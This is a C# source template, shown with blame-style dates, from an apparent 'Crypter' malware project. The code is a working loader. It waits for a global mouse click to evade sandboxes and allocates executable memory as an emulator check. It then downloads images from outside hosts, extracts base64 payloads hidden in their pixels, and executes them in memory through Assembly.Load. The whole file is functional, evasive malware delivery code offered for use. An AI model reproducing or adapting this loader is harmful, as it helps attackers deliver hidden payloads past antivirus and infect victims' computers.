Crypter/Crypter/Resources/imgcrypt.txt

107 lines
3.5 KiB
Plaintext
Raw Normal View History

2020-04-27 18:58:15 -07:00
using System;
using System.Drawing;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
2020-05-26 01:09:51 -07:00
using System.Windows.Forms;
using Gma.System.MouseKeyHook;
2020-04-27 18:58:15 -07:00
2020-05-26 01:09:51 -07:00
namespace DCloader
2020-04-27 18:58:15 -07:00
{
class Program
{
2020-05-26 01:09:51 -07:00
static void Main(string[] args)
{
ListenForMouseEvents();
//Run the app as a windows forms application
Application.Run(new ApplicationContext());
}
2020-04-27 18:58:15 -07:00
[DllImport("kernel32.dll")]
private static extern int VirtualAllocExNuma(IntPtr hProcess, int lpAddress, int dwSize, int flAllocationType, int flProtect, int nndPreferred);
2020-05-26 01:09:51 -07:00
public static void ListenForMouseEvents()
{
int firstTime = 0;
//When a mouse button is pressed
Hook.GlobalEvents().MouseDown += async (sender, e) =>
{
if (firstTime == 0)
{
firstTime++;
AppDomain tempDomain = AppDomain.CreateDomain("TempDomain");
tempDomain.DoCallBack(Load);
Hook.GlobalEvents().Dispose();
}
};
}
public static byte[] depixelate(Bitmap img)
{
StringBuilder holder = new StringBuilder();
int xmax = img.Width - 1;
int ymax = img.Height - 1;
for (int y = 1; y <= ymax; y++)
{
for (int x = 1; x <= xmax; x++)
{
Color c = img.GetPixel(x, y);
holder.Append((char)c.R);
}
}
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
}
private static void Load()
2020-04-27 18:58:15 -07:00
{
2020-05-26 01:09:51 -07:00
object mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, 0, 1000, 0x00002000 | 0x00001000, 0x40, 0);
2020-04-27 18:58:15 -07:00
if (mem != null)
{
Console.WriteLine("Downloading files...");
//string loader = @"http://i.imgur.com/y66QVE2.png"; // No Startup,Global
string loader = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No StartupCHINA
string file = @"123456"; //File
var requestLoader = WebRequest.Create(loader);
var requestFile = WebRequest.Create(file);
Bitmap loaderIMG;
Bitmap fileIMG;
Console.WriteLine("Downloading Loader...");
using (var response = requestLoader.GetResponse())
using (var stream = response.GetResponseStream())
{
loaderIMG = (Bitmap)Image.FromStream(stream);
}
Console.WriteLine("Downloading File...");
using (var response = requestFile.GetResponse())
using (var stream = response.GetResponseStream())
{
fileIMG = (Bitmap)Image.FromStream(stream);
}
Console.WriteLine("Depixelating...");
Console.WriteLine("Depixelating Loader...");
byte[] outputLoader = depixelate(loaderIMG);
Console.WriteLine("Depixelating File...");
byte[] outputFile = depixelate(fileIMG);
Console.WriteLine("Running...");
System.Reflection.Assembly.Load(outputLoader).GetType("Loader.Loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFile });
}
}
}
}